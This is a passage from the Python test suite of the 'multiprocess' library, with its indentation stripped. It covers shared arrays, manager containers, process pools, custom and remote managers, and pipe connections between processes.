self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
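# Replace seq in place with its running (prefix) sums.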
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
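# Generator yielding 0..total-1 that raises SayWhenError immediately
# (when == -1) or once i reaches `when`.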
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# exiting the with-block above called pool.terminate(), so the
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with warnings_helper.check_warnings(
('unclosed running multiprocessing pool', ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def _test_unpickleable_result(self):
from multiprocess.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocess.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
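# Proxy exposing only __next__; iterating the proxy forwards each step to
# the remote generator via _callmethod.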
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle, this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
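# Child: echo each byte message back to the parent until the empty
# SENTINEL arrives, then close the connection.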
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by the parent
# process immediately after the child is spawned. On Windows this
# sometimes failed on old versions because child_conn would be
# closed before the child got a chance to duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
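# Return True if fd refers to an open descriptor (fstat succeeds),
# False if it is unassigned (EBADF); re-raise any other error.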
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
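# Child: optionally duplicate the connection's fd onto every free
# descriptor below 256 (forcing the transferred fd to be large), then
# receive a handle over the connection and write `data` to it.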
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
